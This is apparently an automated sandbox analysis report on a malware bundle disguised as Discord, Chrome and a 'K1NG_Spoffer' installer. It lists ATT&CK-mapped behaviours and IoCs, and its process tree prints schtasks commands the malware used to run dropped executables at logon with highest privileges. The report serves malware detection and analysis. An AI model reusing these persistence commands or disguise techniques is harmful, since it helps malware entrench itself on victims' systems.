Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ICACLS.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Google Chrome.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	discord.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Runtime.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXPAND.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Google Chrome.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Runhelper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 6 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5008	cmd.exe
3728	netsh.exe
5380	cmd.exe
2312	netsh.exe
4072	cmd.exe
3704	netsh.exe

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000007daebf27fdc62d460000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800007daebf270000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809007daebf27000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d7daebf27000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000007daebf2700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2208	WMIC.exe
2928	WMIC.exe
5820	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4940	systeminfo.exe
1960	systeminfo.exe
1440	systeminfo.exe

Kills process with taskkill 3 IoCs

defense_evasion

pid	Process
5896	taskkill.exe
5984	taskkill.exe
2364	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe

Modifies registry class 26 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings	timaverkni 2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\7E7745F463FAA5F4A8E7F4EC233992AA	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\PackageCode = "3F4DC5B48CA211D44915ADEBE6E8EDD8"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\8E3FD593AF9762240A2D95757DD305D7\7E7745F463FAA5F4A8E7F4EC233992AA	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\SourceList\Net\1 = "C:\\Users\\Admin\\Desktop\\topg6565767677\\topg6565767677\\K1ngmsi\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\Desktop\\topg6565767677\\topg6565767677\\K1ngmsi\\"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings	taskmgr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\ProductName = "Microsoft .NET Host - 7.0.16 (x64) - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\Version = "16842753"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\DeploymentFlags = "2"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\8E3FD593AF9762240A2D95757DD305D7	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\SourceList\Net	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\SourceList\PackageName = "K1NG_Spoffer.msi"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings	Rumtime.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings	OpenWith.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\7E7745F463FAA5F4A8E7F4EC233992AA\ProductFeature	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7E7745F463FAA5F4A8E7F4EC233992AA\SourceList\Media\1 = ";"	msiexec.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
460	schtasks.exe
4916	schtasks.exe
5648	schtasks.exe
1904	schtasks.exe
3500	schtasks.exe
3220	schtasks.exe
2016	schtasks.exe
2640	schtasks.exe
2328	schtasks.exe
3084	schtasks.exe
5136	schtasks.exe
3500	schtasks.exe
5468	schtasks.exe
4076	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
5376	WINWORD.EXE
5376	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
2712	discord.exe
2712	discord.exe
2712	discord.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
2712	discord.exe
2712	discord.exe
2712	discord.exe
1216	taskmgr.exe
2712	discord.exe
2712	discord.exe
2712	discord.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
2712	discord.exe
2712	discord.exe
2712	discord.exe
2712	discord.exe
2712	discord.exe
2712	discord.exe
2892	Google Chrome.exe
2892	Google Chrome.exe
2892	Google Chrome.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
2892	Google Chrome.exe

Suspicious behavior: GetForegroundWindowSpam 7 IoCs

pid	Process
2712	discord.exe
2892	Google Chrome.exe
400	Runtime.exe
1216	taskmgr.exe
2432	Google Chrome.exe
3144	Runhelper.exe
1472	Google Chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1216	taskmgr.exe
Token: SeSystemProfilePrivilege	1216	taskmgr.exe
Token: SeCreateGlobalPrivilege	1216	taskmgr.exe
Token: SeDebugPrivilege	2712	discord.exe
Token: SeDebugPrivilege	1364	google.exe
Token: SeDebugPrivilege	3732	googlee.exe
Token: SeDebugPrivilege	3424	Runtime Broker.exe
Token: SeDebugPrivilege	2892	Google Chrome.exe
Token: SeDebugPrivilege	1388	image2.exe
Token: SeDebugPrivilege	400	Runtime.exe
Token: SeDebugPrivilege	2648	tv.exe
Token: SeDebugPrivilege	3680	Runtime Broker.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	3300	powershell.exe
Token: SeDebugPrivilege	4916	powershell.exe
Token: SeDebugPrivilege	2076	tasklist.exe
Token: SeDebugPrivilege	1580	tasklist.exe
Token: SeDebugPrivilege	3644	tasklist.exe
Token: SeDebugPrivilege	1876	powershell.exe
Token: SeIncreaseQuotaPrivilege	2964	WMIC.exe
Token: SeSecurityPrivilege	2964	WMIC.exe
Token: SeTakeOwnershipPrivilege	2964	WMIC.exe
Token: SeLoadDriverPrivilege	2964	WMIC.exe
Token: SeSystemProfilePrivilege	2964	WMIC.exe
Token: SeSystemtimePrivilege	2964	WMIC.exe
Token: SeProfSingleProcessPrivilege	2964	WMIC.exe
Token: SeIncBasePriorityPrivilege	2964	WMIC.exe
Token: SeCreatePagefilePrivilege	2964	WMIC.exe
Token: SeBackupPrivilege	2964	WMIC.exe
Token: SeRestorePrivilege	2964	WMIC.exe
Token: SeShutdownPrivilege	2964	WMIC.exe
Token: SeDebugPrivilege	2964	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2964	WMIC.exe
Token: SeRemoteShutdownPrivilege	2964	WMIC.exe
Token: SeUndockPrivilege	2964	WMIC.exe
Token: SeManageVolumePrivilege	2964	WMIC.exe
Token: 33	2964	WMIC.exe
Token: 34	2964	WMIC.exe
Token: 35	2964	WMIC.exe
Token: 36	2964	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2964	WMIC.exe
Token: SeSecurityPrivilege	2964	WMIC.exe
Token: SeTakeOwnershipPrivilege	2964	WMIC.exe
Token: SeLoadDriverPrivilege	2964	WMIC.exe
Token: SeSystemProfilePrivilege	2964	WMIC.exe
Token: SeSystemtimePrivilege	2964	WMIC.exe
Token: SeProfSingleProcessPrivilege	2964	WMIC.exe
Token: SeIncBasePriorityPrivilege	2964	WMIC.exe
Token: SeCreatePagefilePrivilege	2964	WMIC.exe
Token: SeBackupPrivilege	2964	WMIC.exe
Token: SeRestorePrivilege	2964	WMIC.exe
Token: SeShutdownPrivilege	2964	WMIC.exe
Token: SeDebugPrivilege	2964	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2964	WMIC.exe
Token: SeRemoteShutdownPrivilege	2964	WMIC.exe
Token: SeUndockPrivilege	2964	WMIC.exe
Token: SeManageVolumePrivilege	2964	WMIC.exe
Token: 33	2964	WMIC.exe
Token: 34	2964	WMIC.exe
Token: 35	2964	WMIC.exe
Token: 36	2964	WMIC.exe
Token: SeDebugPrivilege	4120	powershell.exe
Token: SeDebugPrivilege	5896	taskkill.exe
Token: SeDebugPrivilege	5984	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
3732	googlee.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
3732	googlee.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe
1216	taskmgr.exe

Suspicious use of SetWindowsHookEx 58 IoCs

pid	Process
5584	csc.exe
4356	csc.exe
4680	OpenWith.exe
4680	OpenWith.exe
4680	OpenWith.exe
4680	OpenWith.exe
4680	OpenWith.exe
4680	OpenWith.exe
4680	OpenWith.exe
4680	OpenWith.exe
4680	OpenWith.exe
4680	OpenWith.exe
4680	OpenWith.exe
5208	csc.exe
5376	WINWORD.EXE
5376	WINWORD.EXE
5376	WINWORD.EXE
5376	WINWORD.EXE
5376	WINWORD.EXE
5376	WINWORD.EXE
5376	WINWORD.EXE
928	RuntimeBroker.exe
1656	runexehelper.exe
5016	runexehelper.exe
2692	csc.exe
5204	csc.exe
5392	csc.exe
4400	csc.exe
4464	spoffer_update.exe
5376	WINWORD.EXE
5376	WINWORD.EXE
5376	WINWORD.EXE
5376	WINWORD.EXE
244	csc.exe
4384	csc.exe
3104	csc.exe
4056	csc.exe
5036	csc.exe
2212	csc.exe
6048	csc.exe
5892	csc.exe
2292	csc.exe
5376	WINWORD.EXE
5376	WINWORD.EXE
5376	WINWORD.EXE
5376	WINWORD.EXE
736	csc.exe
5280	csc.exe
5656	csc.exe
4800	csc.exe
5240	csc.exe
3056	csc.exe
652	csc.exe
4056	csc.exe
5640	csc.exe
5024	csc.exe
5944	K1NG_Spoffer.exe
2356	csc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2712 wrote to memory of 1904	2712	discord.exe	88
PID 2712 wrote to memory of 1904	2712	discord.exe	88
PID 2712 wrote to memory of 1904	2712	discord.exe	88
PID 2712 wrote to memory of 3500	2712	discord.exe	90
PID 2712 wrote to memory of 3500	2712	discord.exe	90
PID 2712 wrote to memory of 3500	2712	discord.exe	90
PID 1364 wrote to memory of 3220	1364	google.exe	93
PID 1364 wrote to memory of 3220	1364	google.exe	93
PID 1364 wrote to memory of 3732	1364	google.exe	95
PID 1364 wrote to memory of 3732	1364	google.exe	95
PID 3732 wrote to memory of 2016	3732	googlee.exe	96
PID 3732 wrote to memory of 2016	3732	googlee.exe	96
PID 1692 wrote to memory of 3424	1692	Google Chrome.exe	99
PID 1692 wrote to memory of 3424	1692	Google Chrome.exe	99
PID 4512 wrote to memory of 2892	4512	Google Chrome 1.exe	101
PID 4512 wrote to memory of 2892	4512	Google Chrome 1.exe	101
PID 4512 wrote to memory of 2892	4512	Google Chrome 1.exe	101
PID 2892 wrote to memory of 3084	2892	Google Chrome.exe	102
PID 2892 wrote to memory of 3084	2892	Google Chrome.exe	102
PID 2892 wrote to memory of 3084	2892	Google Chrome.exe	102
PID 2892 wrote to memory of 2640	2892	Google Chrome.exe	104
PID 2892 wrote to memory of 2640	2892	Google Chrome.exe	104
PID 2892 wrote to memory of 2640	2892	Google Chrome.exe	104
PID 1884 wrote to memory of 1388	1884	image.exe	107
PID 1884 wrote to memory of 1388	1884	image.exe	107
PID 1388 wrote to memory of 1540	1388	image2.exe	108
PID 1388 wrote to memory of 1540	1388	image2.exe	108
PID 1540 wrote to memory of 944	1540	csc.exe	110
PID 1540 wrote to memory of 944	1540	csc.exe	110
PID 1388 wrote to memory of 400	1388	image2.exe	111
PID 1388 wrote to memory of 400	1388	image2.exe	111
PID 1388 wrote to memory of 400	1388	image2.exe	111
PID 400 wrote to memory of 2328	400	Runtime.exe	112
PID 400 wrote to memory of 2328	400	Runtime.exe	112
PID 400 wrote to memory of 2328	400	Runtime.exe	112
PID 400 wrote to memory of 4916	400	Runtime.exe	114
PID 400 wrote to memory of 4916	400	Runtime.exe	114
PID 400 wrote to memory of 4916	400	Runtime.exe	114
PID 5056 wrote to memory of 2648	5056	image.exe	117
PID 5056 wrote to memory of 2648	5056	image.exe	117
PID 2648 wrote to memory of 1028	2648	tv.exe	118
PID 2648 wrote to memory of 1028	2648	tv.exe	118
PID 1028 wrote to memory of 3380	1028	csc.exe	120
PID 1028 wrote to memory of 3380	1028	csc.exe	120
PID 2648 wrote to memory of 1212	2648	tv.exe	121
PID 2648 wrote to memory of 1212	2648	tv.exe	121
PID 1212 wrote to memory of 3680	1212	Runtime Broker1.exe	122
PID 1212 wrote to memory of 3680	1212	Runtime Broker1.exe	122
PID 1212 wrote to memory of 3332	1212	Runtime Broker1.exe	123
PID 1212 wrote to memory of 3332	1212	Runtime Broker1.exe	123
PID 3332 wrote to memory of 936	3332	runexehelper.exe	124
PID 3332 wrote to memory of 936	3332	runexehelper.exe	124
PID 936 wrote to memory of 4152	936	runexehelper.exe	126
PID 936 wrote to memory of 4152	936	runexehelper.exe	126
PID 936 wrote to memory of 952	936	runexehelper.exe	127
PID 936 wrote to memory of 952	936	runexehelper.exe	127
PID 936 wrote to memory of 1324	936	runexehelper.exe	129
PID 936 wrote to memory of 1324	936	runexehelper.exe	129
PID 952 wrote to memory of 3632	952	cmd.exe	132
PID 952 wrote to memory of 3632	952	cmd.exe	132
PID 1324 wrote to memory of 3300	1324	cmd.exe	133
PID 1324 wrote to memory of 3300	1324	cmd.exe	133
PID 4152 wrote to memory of 4916	4152	cmd.exe	134
PID 4152 wrote to memory of 4916	4152	cmd.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\topg6565767677.zip
1⤵
PID:4680

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1580

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1216

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\discord\discord.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\discord\discord.exe"
1⤵
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2712
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks.exe" /create /f /tn "WAN Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmp5172.tmp"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:1904
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks.exe" /create /f /tn "WAN Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp51F0.tmp"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:3500

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\google23\google.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\google23\google.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1364
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /create /tn "google" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\google\googlee.exe" /rl HIGHEST /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3220
- C:\Users\Admin\AppData\Roaming\google\googlee.exe
  "C:\Users\Admin\AppData\Roaming\google\googlee.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3732
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "google" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\google\googlee.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2016

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\GoogleChrome0\Google Chrome.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\GoogleChrome0\Google Chrome.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1692
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Runtime Broker.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Runtime Broker.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3424

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\GoogleChroome\Google Chrome 1.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\GoogleChroome\Google Chrome 1.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4512
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\Google Chrome.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Google Chrome.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2892
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /create /f /tn "WAN Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmp94B4.tmp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3084
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /create /f /tn "WAN Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp9513.tmp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2640
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\Google Chromee.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Google Chromee.exe"
  2⤵
  - Executes dropped EXE
  PID:6108
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Google Chromee.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Google Chromee.exe"
